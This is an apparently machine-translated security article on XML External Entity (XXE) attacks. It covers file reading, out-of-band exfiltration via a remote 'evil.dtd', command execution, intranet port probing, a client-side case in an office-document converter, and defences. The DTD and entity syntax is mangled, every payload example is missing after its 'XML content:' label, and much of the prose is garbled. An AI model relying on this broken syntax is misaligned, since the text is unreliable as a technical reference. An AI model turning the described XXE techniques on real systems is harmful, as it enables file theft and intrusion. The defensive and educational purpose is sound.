XML is a kind of markup language which is used to tag electronic files and make them have structure. It can be used to tag data and define data types. It is a source language that allows users to define their own markup language. XML document structure includes XML declaration, DTD document type definition (optional), document element.
DTD (document type definition) is used to define the legal building blocks of XML documents. DTD can be declared in an XML document or referenced externally.
Internal declaration DTD
Root element [element declaration] >
Reference external DTD
Root element system "filename" >
perhaps
Root element public "public" Id "filename >
DTD entities are variables that define shortcuts that reference plain text or special characters, and can be declared internally or referenced externally.
Internal declaration entity
Entity name "value of entity" >
Reference external entity
Entity name system "URI" >
perhaps
Entity name public "public" Id "" URI ">
2、 XML external entity
When it is allowed to refer to external entities, by constructing malicious content, it can lead to read arbitrary files, execute system commands, detect intranet ports, attack intranet sites and other hazards.
There are many ways to introduce external entities, such as:
Malicious introduction of external entity mode 1:
XML content:
Malicious introduction of external entity mode 2:
XML content:
DTD file (evil. DTD) content:
Malicious introduction of external entity mode 3:
XML content:
DTD file (evil. DTD) content:
In addition, different programs support different protocols,
The figure above shows the default support protocol, which can also support other extension protocols, such as PHP
The following examples illustrate the hazards of xxE, which are not the only ones.
XxE hazard 1: reading arbitrary files
The case is to read / etc / passwd. Some XML parsing libraries support column directories. The attacker can obtain the account password through column directories and reading files, and then further attack. For example, after reading tomcat-users.xml to get the account password, log in to the manager of Tomcat to deploy webshell.
Besides, is there no problem if the data is not echoed? As follows,
No, you can send data to a remote server,
The contents of the remote evil.dtd file are as follows:
After triggering the xxE attack, the server will send the contents of the file to the attacker's website
XxE hazard 2: execution of system commands
This case is to execute system commands in the PHP environment where expect extension is installed. Other protocols may also execute system commands.
XxE hazard 3: detection of Intranet port
The case is to probe port 80 and port 81 of 192.168.1.1. It can be known that the port 81 is closed and port 80 is open through the returned "connection rejected".
XxE hazard 4: attack intranet site
The case is to attack the intranet struts 2 website and execute system commands remotely.
3、 Client xxE case
Recently, an office document conversion software was found to have a xxE vulnerability (PS: thanks for the white hat Titans' report vulnerability of TSRC platform). An application scenario is: Web programs call the office software to obtain the content of office documents and provide online preview. Because the software reads XML files and allows reference to external entities when processing office documents, when users upload malicious documents and preview, it triggers the xxE attack. Details are as follows:
Create a new normal document with the content of hi TSRC,
After using the software, we can get the document content in text format,
When malicious code (referring to external entities) is injected into the docx's XML file, an xxE attack can be carried out.
4、 Defend against xxE attack
Scheme 1: use the method provided by development language to disable external entities
PHP:
libxml_disable_entity_loader(true);
Other languages:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet
Scheme 2: filter XML data submitted by users
Keywords: system and public.
[last]
Whether it is a web program or a PC program, as long as the user controlled XML is processed, there may be a very harmful xxE vulnerability. Developers need to be careful when processing XML, and prohibit the reference of external entities in the user controlled XML data.
The code and technical details involved in this article are only used for technical exchange, and shall not be used for illegal purposes. Welcome to discuss and exchange, writing in a hurry, shortcomings, please do not hesitate to criticize and correct.
[reference]
http://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
http://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf
https://www.owasp.org/images/5/5d/XML_Exteral_Entity_Attack.pdf
https://www.youtube.com/watch?v=j2cfebNEfic